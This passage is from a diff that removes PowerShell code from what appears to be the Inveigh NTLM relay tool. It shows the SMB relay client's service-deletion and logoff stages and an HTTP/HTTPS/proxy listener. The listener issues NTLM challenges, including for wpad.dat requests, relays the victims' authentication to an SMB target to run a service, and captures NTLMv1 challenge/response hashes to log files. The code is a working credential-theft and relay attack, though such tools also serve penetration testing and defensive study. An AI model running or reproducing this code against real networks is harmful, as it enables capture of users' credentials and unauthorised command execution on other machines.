- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadRequest'
- $SMB_client_stage_next = 'CloseServiceHandle'
- $SMB_close_service_handle_stage = 1
- }
-
- 'CloseServiceHandle'
- {
-
- if($SMB_close_service_handle_stage -eq 1)
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target")
- $SMB2_message_ID += 20
- $SMB_close_service_handle_stage++
- $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
- }
-
- }
- else
- {
- $SMB2_message_ID += 1
- $SMB_client_stage = 'CloseRequest'
- $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
- }
-
- $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- }
-
- 'CloseRequest'
- {
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2CloseRequest $SMB_file_ID
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'TreeDisconnect'
- }
-
- 'TreeDisconnect'
- {
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2TreeDisconnectRequest
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'Logoff'
- }
-
- 'Logoff'
- {
- $SMB2_message_ID += 20
- $packet_SMB2_header = Get-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2SessionLogoffRequest
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'Exit'
- }
-
- }
-
- if($SMB_relay_failed)
- {
- $inveigh.console_queue.Add("SMB relay failed on $Target")
- $SMB_client_stage = 'Exit'
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
- }
-
- }
-
- }
-
- }
-
- if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y')
- {
- $inveigh.console_queue.Add("SMB relay auto disabled due to success")
- $inveigh.SMB_relay = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay auto disabled due to success")
- }
-
- }
-
- }
-
- $SMB_relay_socket.Close()
-
- return $SMB_client_receive
- }
-
-}
-
-# HTTP/HTTPS/Proxy Server ScriptBlock
-$HTTP_scriptblock =
-{
- param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPS_listener,$Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$Usernames,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
-
- function NTLMChallengeBase64
- {
- param ([String]$Challenge,[String]$ClientIPAddress,[Int]$ClientPort)
-
- $HTTP_timestamp = Get-Date
- $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
- $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
- $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
- if($Challenge)
- {
- $HTTP_challenge = $Challenge
- $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
- $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- }
- else
- {
- $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
- $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- }
-
- $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
-
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
- $HTTP_challenge_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
- 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
- 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
- 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
- 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
- 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
- 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
- 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
- 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
- $HTTP_timestamp +
- 0x00,0x00,0x00,0x00,0x0a,0x0a
-
- $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
- $NTLM = 'NTLM ' + $NTLM_challenge_base64
- $NTLM_challenge = $HTTP_challenge
-
- return $NTLM
- }
-
- if($HTTPS_listener)
- {
- $HTTP_type = "HTTPS"
- }
- elseif($proxy_listener)
- {
- $HTTP_type = "Proxy"
- }
- else
- {
- $HTTP_type = "HTTP"
- }
-
- if($HTTPIP -ne '0.0.0.0')
- {
- $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
- $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
- }
- else
- {
- $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
- }
-
- $HTTP_running = $true
- $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
- $HTTP_client_close = $true
- $relay_step = 0
-
- if($proxy_listener)
- {
- $HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0)
- $HTTP_listener.Server.LingerState = $HTTP_linger
- }
-
- try
- {
- $HTTP_listener.Start()
- }
- catch
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- $HTTP_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- }
-
- }
-
- :HTTP_listener_loop while($inveigh.relay_running -and $HTTP_running)
- {
- $TCP_request = ""
- $TCP_request_bytes = New-Object System.Byte[] 4096
- $HTTP_send = $true
- $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
- $HTTP_header_cache_control = ""
- $HTTP_header_authenticate = ""
- $HTTP_header_authenticate_data = ""
- $HTTP_message = ""
- $HTTP_header_authorization = ""
- $HTTP_header_host = ""
- $HTTP_header_user_agent = ""
- $HTTP_request_raw_URL = ""
- $NTLM = "NTLM"
-
- while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
- {
- Start-Sleep -m 10
-
- if(!$inveigh.relay_running)
- {
- break HTTP_listener_loop
- }
-
- }
-
- if($relay_step -gt 0)
- {
- $relay_reset++
-
- if($relay_reset -gt 2)
- {
- $inveigh.console_queue.Add("SMB relay attack resetting")
- $SMB_relay_socket.Close()
- $relay_step = 0
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay attack resetting")
- }
-
- }
-
- }
- else
- {
- $relay_reset = 0
- }
-
- if($HTTPS_listener)
- {
-
- if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
- {
- $HTTP_client = $HTTP_listener.AcceptTcpClient()
- $HTTP_clear_stream = $HTTP_client.GetStream()
- $HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false)
- $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN})
- $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false)
- }
-
- [byte[]]$SSL_request_bytes = $null
-
- do
- {
- $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
- $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)]
- } while ($HTTP_clear_stream.DataAvailable)
-
- $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes)
- }
- else
- {
-
- if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
- {
- $HTTP_client = $HTTP_listener.AcceptTcpClient()
- $HTTP_stream = $HTTP_client.GetStream()
- }
-
- if($HTTP_stream.DataAvailable)
- {
- $HTTP_data_available = $true
- }
- else
- {
- $HTTP_data_available = $false
- }
-
- while($HTTP_stream.DataAvailable)
- {
- $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
- }
-
- $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
- }
-
- if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*")
- {
- $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
- $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
- $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
-
- if($TCP_request -like "*-48-6F-73-74-3A-20-*")
- {
- $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19)
- $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
- $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
- }
-
- if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
- {
- $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37)
- $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
- $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
- }
-
- if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
- }
-
- if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- }
-
- }
-
- }
-
- if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
- {
- $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
- $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-"))
- $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
- }
-
- if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
- $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
- {
- $HTTP_response_status_code = 0x32,0x30,0x30
- $HTTP_response_phrase = 0x4f,0x4b
- $HTTP_client_close = $true
- }
- else
- {
-
- if($proxy_listener)
- {
- $HTTP_response_status_code = 0x34,0x30,0x37
- $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
- }
- else
- {
- $HTTP_response_status_code = 0x34,0x30,0x31
- $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
-
- if($HTTP_request_raw_URL -match '/wpad.dat')
- {
- $HTTP_reset_delay = $true
- $HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout
- $HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
- }
-
- $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
- $HTTP_client_close = $false
- }
-
- if($HTTP_header_authorization.StartsWith('NTLM '))
- {
- $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
- [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
-
- if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
- {
-
- if($inveigh.SMB_relay -and $HTTP_source_IP -ne $Target -and $relay_step -eq 0)
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)
- }
-
- $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by $HTTP_source_IP at $(Get-Date -format 's')")
- $inveigh.console_queue.Add("Grabbing challenge for relay from $Target")
- $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
- $SMB_relay_socket.Client.ReceiveTimeout = 60000
- $SMB_relay_socket.Connect($Target,"445")
- $HTTP_client_close = $false
- $relay_step = 1
-
- if(!$SMB_relay_socket.connected)
- {
- $inveigh.console_queue.Add("SMB relay target is not responding")
- $relay_step = 0
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay target is not responding")
- }
-
- }
-
- if($relay_step -eq 1)
- {
- $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version
-
- if($SMB_relay_bytes.Length -le 3)
- {
- $relay_step = 0
- $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
- }
-
- }
-
- if($relay_step -eq 1)
- {
- $SMB_user_ID = $SMB_relay_bytes[34..33]
- $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
- $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
- $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
- $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
- $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
- $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
- $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
- $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
- $SMB_relay_target_flag = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 22)]
- $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
- $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
- $SMB_session_ID = $SMB_relay_bytes[44..51]
-
- if([System.BitConverter]::ToString($SMB_relay_bytes[4..7]) -eq 'ff-53-4d-42')
- {
- $SMB_version -eq 'SMB1'
- }
-
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
- $SMB_domain_length_offset_bytes +
- 0x05,0x82 +
- $SMB_relay_target_flag +
- 0xa2 +
- $SMB_relay_NTLM_challenge +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
- $SMB_target_length_offset_bytes +
- $SMB_relay_target_details
-
- $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
- $NTLM = 'NTLM ' + $NTLM_challenge_base64
- $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
- $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
- $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
- $relay_step = 2
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.log.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
- }
-
- }
- else
- {
- $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
- }
-
- }
- else
- {
- $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
- }
-
- }
- elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
- {
- $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
- $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
- $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
- $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
- [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
- $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
- $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
-
- if($HTTP_NTLM_domain_length -eq 0)
- {
- $HTTP_NTLM_domain_string = ''
- }
- else
- {
- $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
- }
-
- $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
- $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
-
- if($HTTP_NTLM_user_length -gt 0)
- {
- $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
- }
- else
- {
- $HTTP_NTLM_user_string = ""
- }
-
- $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
- $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
- $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
-
- if($HTTP_NTLM_length -eq 24) # NTLMv1
- {
- $NTLM_type = "NTLMv1"
- $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
- $NTLM_response = $NTLM_response.Insert(48,':')
- $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
-
- if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
- {
- $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
- {
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
- }
- else
- {
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
- }
-
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
- {
- $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file)
- }
-
